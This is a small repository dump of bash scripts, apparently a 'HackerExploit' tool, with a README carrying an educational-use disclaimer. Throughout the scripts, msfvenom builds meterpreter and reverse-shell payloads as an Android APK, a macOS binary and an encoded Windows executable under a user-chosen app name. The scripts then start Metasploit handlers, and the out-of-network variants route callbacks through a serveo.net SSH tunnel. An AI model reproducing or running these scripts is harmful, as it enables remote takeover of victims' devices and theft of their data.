├── README.md ├── ac.sh ├── hackexploit.sh ├── mh.sh ├── oon ├── an.sh ├── mn.sh └── wn.sh ├── run.sh ├── sys ├── android.sh ├── mac.sh └── windows.sh └── wc.sh /README.md: -------------------------------------------------------------------------------- 1 | # hackerexploit 2 | this tool only for educational purpose . 3 | Disclaimer: We are no responsibility any action . 4 | 5 | if you want you use for educational purpose 6 | 7 | 8 | 9 | follow the step : 10 | ================ 11 | 12 | 13 | 14 | apt-get install git 15 | 16 | git clone https://github.com/wh-hackerexploit/hackerexploit.git 17 | 18 | cd hackerexploit 19 | 20 | chmod 777 * 21 | 22 | bash ./run.sh 23 | 24 | 25 | 26 | 27 | Requirements pkg 28 | ================= 29 | metasploit 30 | 31 | touch 32 | 33 | apktool 34 | 35 | and by defult automacit install other pkg 36 | 37 | this tool create by { White-Hacker (Hacker Exploit) }™ 38 | 39 | Watch Video on YouTube . 40 | url : https://youtu.be/YlqmWXtN5W8 41 | -------------------------------------------------------------------------------- /ac.sh: -------------------------------------------------------------------------------- 1 | clear 2 | echo "Confirm your Network System " 3 | 4 | 5 | 6 | select planet in "Same-network" "Out-of-Network" "back" 7 | 8 | do 9 | if [ "$planet" == Same-network ] 10 | 11 | then 12 | bash ./sys/android.sh 13 | 14 | elif [ "$planet" == Out-of-Network ] 15 | then 16 | bash ./oon/an.sh 17 | 18 | elif [ "$planet" == back ] 19 | then 20 | bash ./hackexploit.sh 21 | 22 | 23 | 24 | 25 | fi 26 | done 27 | -------------------------------------------------------------------------------- /hackexploit.sh: -------------------------------------------------------------------------------- 1 | 2 | 3 | #!/bin/bash 4 | 5 | chmod 777 * 6 | 7 | apt-get install figlet 8 | 9 | 10 | clear 11 | 12 | #logo or name 13 | echo " WELCOME TO The " 14 | 15 | echo " " 16 | echo " ██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗" 17 | echo " ██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗ ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝" 18 | echo " ███████║███████║██║ █████╔╝ █████╗ ██████╔╝ █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ " 19 | echo " ██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗ ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ " 20 | echo " ██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║ ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ " 21 | echo " ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ " 22 | echo " " 23 | 24 | echo "Select Your target Option" 25 | 26 | select planet in "android" "windows" "mac" "Quit" 27 | 28 | do 29 | if [ "$planet" == android ] 30 | 31 | then 32 | bash ./ac.sh 33 | 34 | elif [ "$planet" == windows ] 35 | then 36 | bash ./wc.sh 37 | 38 | elif [ "$planet" == mac ] 39 | 40 | then 41 | 42 | bash ./mh.sh 43 | 44 | else [ "$plant" == Quit ] 45 | 46 | 47 | 48 | echo "Good Bye" 49 | 50 | 51 | exit 0 52 | 53 | fi 54 | done 55 | 56 | -------------------------------------------------------------------------------- /mh.sh: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | clear 5 | echo "Confirm your Network System " 6 | 7 | 8 | 9 | select planet in "Same-network" "Out-of-Network" "back" 10 | 11 | do 12 | if [ "$planet" == Same-network ] 13 | 14 | then 15 | bash ./sys/mac.sh 16 | 17 | elif [ "$planet" == Out-of-Network ] 18 | then 19 | bash ./oon/mn.sh 20 | 21 | elif [ "$planet" == back ] 22 | then 23 | bash ./hackexploit.sh 24 | 25 | 26 | 27 | 28 | fi 29 | done 30 | -------------------------------------------------------------------------------- /oon/an.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | 5 | 6 | 7 | clear 8 | 9 | #logo or name 10 | echo " WELCOME TO Android " 11 | 12 | figlet -f standard HACKER 13 | 14 | echo " EXPLOIT " 15 | 16 | 17 | echo "============================================" 18 | echo "your ip info.. " 19 | 20 | ifconfig 21 | 22 | #tool logo 23 | echo "===========================================" 24 | echo "==========||||||||||||||||||||||===========" 25 | echo "==========||||HACKER-EXPLOIT||||===========" 26 | echo "==========||||||||||||||||||||||===========" 27 | echo "===========================================" 28 | 29 | 30 | 31 | 32 | 33 | #data input 34 | echo " please input your current interface ip " 35 | read -p ' HE :~' IP 36 | 37 | echo " please input your Choice Port number " 38 | read -p ' HE :~ ' PORT 39 | 40 | echo " please input your target host ip " 41 | read -p ' HE :~ ' TARGET 42 | 43 | echo " please input your choice App name" 44 | read -p ' HE :~ ' APPNAME 45 | 46 | 47 | #Xterm serveo.net 48 | 49 | xterm -hold -T "Hacker-Exploit" -e "ssh -R $PORT:$IP:$PORT serveo.net" & 50 | 51 | 52 | #OUTPUT 53 | 54 | echo " ===============loading-100%=================" 55 | 56 | echo "file creating while 3 of 2 min " 57 | 58 | msfvenom -p android/meterpreter/reverse_tcp Lhost=serveo.net Lport=$PORT R > ./$APPNAME.apk 59 | 60 | #temp file creating or remove . 61 | 62 | echo "checking temp file and clear case data and temp dir for better perform " 63 | 64 | 65 | 66 | rm -rf ./temp 67 | 68 | 69 | echo " ======================100%======================" 70 | 71 | echo " Creating a msf temp dir" 72 | 73 | 74 | mkdir ./temp 75 | 76 | touch ./temp/$APPNAME.rc 77 | 78 | #exquate ip & port & handeler & payload 79 | 80 | echo " use multi/handler" >> ./temp/$APPNAME.rc 81 | echo " set PAYLOAD android/meterpreter/reverse_tcp " >> ./temp/$APPNAME.rc 82 | echo " set LHOST serveo.net " >> ./temp/$APPNAME.rc 83 | echo " set LPORT $PORT " >> ./temp/$APPNAME.rc 84 | 85 | echo " opening msfconsole " 86 | 87 | 88 | msfconsole -r ./temp/$APPNAME.rc 89 | 90 | 91 | 92 | done 93 | -------------------------------------------------------------------------------- /oon/mn.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | # requirements tool download 5 | clear 6 | 7 | 8 | apt-get install figlet 9 | 10 | apt-get install cat 11 | 12 | clear 13 | 14 | #logo or name 15 | echo " WELCOME TO MAC " 16 | figlet -f standard HACKER 17 | echo " EXPLOIT " 18 | echo "_________________________________________________________________________________" 19 | echo "your ip info.. " 20 | 21 | ifconfig 22 | 23 | #tool logo 24 | echo "===========================================" 25 | echo "==========||||||||||||||||||||||===========" 26 | echo "==========||||HACKER-EXPLOIT||||===========" 27 | echo "==========||||||||||||||||||||||===========" 28 | echo "===========================================" 29 | 30 | 31 | #data input 32 | echo " please input your current interface ip " 33 | read -p ' HE :~' IP 34 | 35 | echo " please input your Choice Port number " 36 | read -p ' HE :~ ' PORT 37 | 38 | 39 | echo " please input your choice App name" 40 | read -p ' HE :~ ' SYSFUC 41 | 42 | 43 | #Xterm serveo.net 44 | 45 | xterm -hold -T "Hacker-Exploit" -e "ssh -R $PORT:$IP:$PORT serveo.net" & 46 | 47 | #OUTPUT 48 | 49 | echo " ===============loading-100%=================" 50 | 51 | echo "file Crearing while 3 of 2 min " 52 | 53 | 54 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=serveo.net LPORT=$PORT -f macho > $SYSFUC.macho 55 | 56 | 57 | 58 | #temp file creating 59 | echo " Creating a msf temp " 60 | rm -rf ./temp 61 | mkdir temp 62 | 63 | touch ./temp/$SYSFUC.rc 64 | 65 | #exquate ip & port & handeler & payload 66 | 67 | echo " use exploit/multi/handler" >> ./temp/$SYSFUC.rc 68 | echo " set payload osx/x86/shell_reverse_tcp " >> ./temp/$SYSFUC.rc 69 | echo " set LHOST serveo.net " >> ./temp/$SYSFUC.rc 70 | echo " set LPORT $PORT " >> ./temp/$SYSFUC.rc 71 | 72 | echo " oping msfconsole " 73 | 74 | 75 | msfconsole -r ./temp/$SYSFUC.rc 76 | 77 | -------------------------------------------------------------------------------- /oon/wn.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | # requirements tool download 5 | clear 6 | 7 | 8 | apt-get install figlet 9 | 10 | apt-get install cat 11 | 12 | clear 13 | 14 | #logo or name 15 | echo " WELCOME TO Windows 7 Machine " 16 | figlet -f standard HACKER 17 | echo " EXPLOIT " 18 | echo "_________________________________________________________________________________" 19 | echo "your ip info.. " 20 | 21 | ifconfig 22 | 23 | #tool logo 24 | echo "===========================================" 25 | echo "==========||||||||||||||||||||||===========" 26 | echo "==========||||HACKER-EXPLOIT||||===========" 27 | echo "==========||||||||||||||||||||||===========" 28 | echo "===========================================" 29 | 30 | 31 | #data input 32 | echo " please input your current interface ip " 33 | read -p ' HE :~' IP 34 | 35 | echo " please input your Choice Port number " 36 | read -p ' HE :~ ' PORT 37 | 38 | 39 | echo " please input your choice App name" 40 | read -p ' HE :~ ' SYSFUC 41 | 42 | 43 | #Xterm serveo.net 44 | 45 | xterm -hold -T "Hacker-Exploit" -e "ssh -R $PORT:$IP:$PORT serveo.net" & 46 | 47 | #OUTPUT 48 | 49 | echo " ===============loading-100%=================" 50 | 51 | echo "file Crearing while 3 of 2 min " 52 | 53 | 54 | msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=serveo.net LPORT=$PORT --encrypt aes256 -f exe -e x86/shikata_ga_nai -i 15 > ./$SYSFUC.exe 55 | 56 | 57 | 58 | 59 | 60 | #temp file creating 61 | echo " Creating a msf temp " 62 | rm -rf ./temp 63 | mkdir temp 64 | 65 | touch ./temp/$SYSFUC.rc 66 | 67 | #exquate ip & port & handeler & payload 68 | 69 | echo " use exploit/multi/handler" >> ./temp/$SYSFUC.rc 70 | echo " set payload windows/meterpreter/reverse_tcp " >> ./temp/$SYSFUC.rc 71 | echo " set LHOST serveo.net " >> ./temp/$SYSFUC.rc 72 | echo " set LPORT $PORT " >> ./temp/$SYSFUC.rc 73 | 74 | echo " oping msfconsole " 75 | 76 | 77 | msfconsole -r ./temp/$SYSFUC.rc 78 | 79 | -------------------------------------------------------------------------------- /run.sh: -------------------------------------------------------------------------------- 1 | 2 | 3 | #!/bin/bash 4 | 5 | chmod 777 * 6 | resize -s 40 120 > /dev/null 7 | 8 | apt-get install figlet 9 | 10 | 11 | clear 12 | 13 | #logo or name 14 | echo "___________________________________________________________________________________________________________________________________________________" 15 | echo "___________________________________________________________________________________________________________________________________________________" 16 | 17 | 18 | echo " WELCOME TO The " 19 | 20 | echo " " 21 | echo " ██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗" 22 | echo " ██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗ ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝" 23 | echo " ███████║███████║██║ █████╔╝ █████╗ ██████╔╝ █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ " 24 | echo " ██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗ ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ " 25 | echo " ██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║ ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ " 26 | echo " ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ " 27 | echo " " 28 | echo "___________________________________________________________________________________________________________________________________________________" 29 | echo "___________________________________________________________________________________________________________________________________________________" 30 | figlet -f standard disclaimer 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | echo " All the content action in this tool is only for educational 43 | purposes." 44 | echo " Any misuse of this content is completely at 45 | your own risk." 46 | echo " Do not try to attempt to break laws or do any illegal stuff 47 | by using this." 48 | 49 | echo " We aren't responsible! " 50 | echo "____________________________________________________________________________________________________________________________" 51 | 52 | echo " if you want you use prese 1 or disAgree : 2 " 53 | 54 | select planet in "I-Agree" "disAgree" 55 | 56 | do 57 | if [ "$planet" == I-Agree ] 58 | 59 | then 60 | bash ./hackexploit.sh 61 | 62 | else [ "$plant" == disAgree ] 63 | 64 | 65 | 66 | echo " shutting Down . Good Bye" 67 | 68 | 69 | exit 0 70 | 71 | fi 72 | done 73 | 74 | 75 | -------------------------------------------------------------------------------- /sys/android.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | 5 | 6 | 7 | clear 8 | 9 | #logo or name 10 | echo " WELCOME TO Android " 11 | 12 | figlet -f standard HACKER 13 | 14 | echo " EXPLOIT " 15 | 16 | 17 | echo "============================================" 18 | echo "your ip info.. " 19 | 20 | ifconfig 21 | 22 | #tool logo 23 | echo "===========================================" 24 | echo "==========||||||||||||||||||||||===========" 25 | echo "==========||||HACKER-EXPLOIT||||===========" 26 | echo "==========||||||||||||||||||||||===========" 27 | echo "===========================================" 28 | #data input 29 | echo " please input your current interface ip " 30 | read -p ' HE :~' IP 31 | 32 | echo " please input your Choice Port number " 33 | read -p ' HE :~ ' PORT 34 | 35 | echo " please input your target host ip " 36 | read -p ' HE :~ ' TARGET 37 | 38 | echo " please input your choice App name" 39 | read -p ' HE :~ ' APPNAME 40 | 41 | 42 | #OUTPUT 43 | 44 | echo " ===============loading-100%=================" 45 | 46 | echo "file creating while 3 of 2 min " 47 | 48 | msfvenom -p android/meterpreter/reverse_tcp Lhost=$IP Lport=$PORT R > ./$APPNAME.apk 49 | 50 | #temp file creating or remove . 51 | 52 | echo "checking temp file and clear case data and temp dir for better perform " 53 | 54 | 55 | 56 | rm -rf ./temp 57 | 58 | 59 | echo " ======================100%======================" 60 | 61 | echo " Creating a msf temp dir" 62 | 63 | 64 | mkdir ./temp 65 | 66 | touch ./temp/$APPNAME.rc 67 | 68 | #exquate ip & port & handeler & payload 69 | 70 | echo " use multi/handler" >> ./temp/$APPNAME.rc 71 | echo " set PAYLOAD android/meterpreter/reverse_tcp " >> ./temp/$APPNAME.rc 72 | echo " set LHOST $IP " >> ./temp/$APPNAME.rc 73 | echo " set LPORT $PORT " >> ./temp/$APPNAME.rc 74 | 75 | echo " opening msfconsole " 76 | 77 | 78 | msfconsole -r ./temp/$APPNAME.rc 79 | 80 | 81 | 82 | done -------------------------------------------------------------------------------- /sys/mac.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | # requirements tool download 5 | clear 6 | 7 | 8 | apt-get install figlet 9 | 10 | apt-get install cat 11 | 12 | clear 13 | 14 | #logo or name 15 | echo " WELCOME TO MAC " 16 | figlet -f standard HACKER 17 | echo " EXPLOIT " 18 | echo "_________________________________________________________________________________" 19 | echo "your ip info.. " 20 | 21 | ifconfig 22 | 23 | #tool logo 24 | echo "===========================================" 25 | echo "==========||||||||||||||||||||||===========" 26 | echo "==========||||HACKER-EXPLOIT||||===========" 27 | echo "==========||||||||||||||||||||||===========" 28 | echo "===========================================" 29 | 30 | 31 | 32 | #info input 33 | 34 | echo " please input your current interface ip or Lhost" 35 | read -p ' HE :~ ' LHOST 36 | 37 | echo " please input your Choice Port number " 38 | read -p ' HE :~ ' LPORT 39 | 40 | 41 | echo " please input your choice (any) action name for temp data " 42 | read -p ' HE :~ ' SYSFUC 43 | 44 | #OUTPUT 45 | 46 | echo " ===============loading-100%=================" 47 | 48 | echo "file Crearing while 3 of 2 min " 49 | 50 | 51 | 52 | 53 | 54 | 55 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f macho > $SYSFUC.macho 56 | 57 | 58 | 59 | #temp file creating 60 | echo " Creating a msf temp " 61 | mkdir temp 62 | 63 | touch ./temp/$SYSFUC.rc 64 | 65 | #exquate ip & port & handeler & payload 66 | 67 | echo " use exploit/multi/handler" >> ./temp/$SYSFUC.rc 68 | echo " set payload osx/x86/shell_reverse_tcp " >> ./temp/$SYSFUC.rc 69 | echo " set LHOST $LHOST " >> ./temp/$SYSFUC.rc 70 | echo " set LPORT $LPORT " >> ./temp/$SYSFUC.rc 71 | 72 | echo " oping msfconsole " 73 | 74 | 75 | msfconsole -r ./temp/$SYSFUC.rc 76 | 77 | -------------------------------------------------------------------------------- /sys/windows.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | # requirements tool download 5 | clear 6 | 7 | 8 | apt-get install figlet 9 | 10 | apt-get install cat 11 | 12 | clear 13 | 14 | #logo or name 15 | echo " WELCOME TO Windows 7 Machine " 16 | figlet -f standard HACKER 17 | echo " EXPLOIT " 18 | echo "_________________________________________________________________________________" 19 | echo "your ip info.. " 20 | 21 | ifconfig 22 | 23 | #tool logo 24 | echo "===========================================" 25 | echo "==========||||||||||||||||||||||===========" 26 | echo "==========||||HACKER-EXPLOIT||||===========" 27 | echo "==========||||||||||||||||||||||===========" 28 | echo "===========================================" 29 | 30 | 31 | 32 | #info input 33 | 34 | echo " please input your current interface ip or Lhost" 35 | read -p ' HE :~ ' LHOST 36 | 37 | echo " please input your Choice Port number " 38 | read -p ' HE :~ ' LPORT 39 | 40 | 41 | echo " please input your choice (any) action name for temp data " 42 | read -p ' HE :~ ' SYSFUC 43 | 44 | #OUTPUT 45 | 46 | echo " ===============loading-100%=================" 47 | 48 | echo "file Crearing while 3 of 2 min " 49 | 50 | 51 | 52 | 53 | 54 | 55 | msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=$LHOST LPORT=$LPORT --encrypt aes256 -f exe -e x86/shikata_ga_nai -i 15 > ./$SYSFUC.exe 56 | 57 | 58 | 59 | 60 | 61 | #temp file creating 62 | echo " Creating a msf temp " 63 | mkdir temp 64 | 65 | touch ./temp/$SYSFUC.rc 66 | 67 | #exquate ip & port & handeler & payload 68 | 69 | echo " use exploit/multi/handler" >> ./temp/$SYSFUC.rc 70 | echo " set payload windows/meterpreter/reverse_tcp " >> ./temp/$SYSFUC.rc 71 | echo " set LHOST $LHOST " >> ./temp/$SYSFUC.rc 72 | echo " set LPORT $LPORT " >> ./temp/$SYSFUC.rc 73 | 74 | echo " oping msfconsole " 75 | 76 | 77 | msfconsole -r ./temp/$SYSFUC.rc 78 | 79 | -------------------------------------------------------------------------------- /wc.sh: -------------------------------------------------------------------------------- 1 | 2 | 3 | clear 4 | echo "Confirm your Network System " 5 | 6 | 7 | 8 | select planet in "Same-network" "Out-of-Network" "back" 9 | 10 | do 11 | if [ "$planet" == Same-network ] 12 | 13 | then 14 | bash ./sys/windows.sh 15 | 16 | elif [ "$planet" == Out-of-Network ] 17 | then 18 | bash ./oon/wn.sh 19 | 20 | elif [ "$planet" == back ] 21 | then 22 | bash ./hackexploit.sh 23 | 24 | 25 | 26 | 27 | fi 28 | done 29 | --------------------------------------------------------------------------------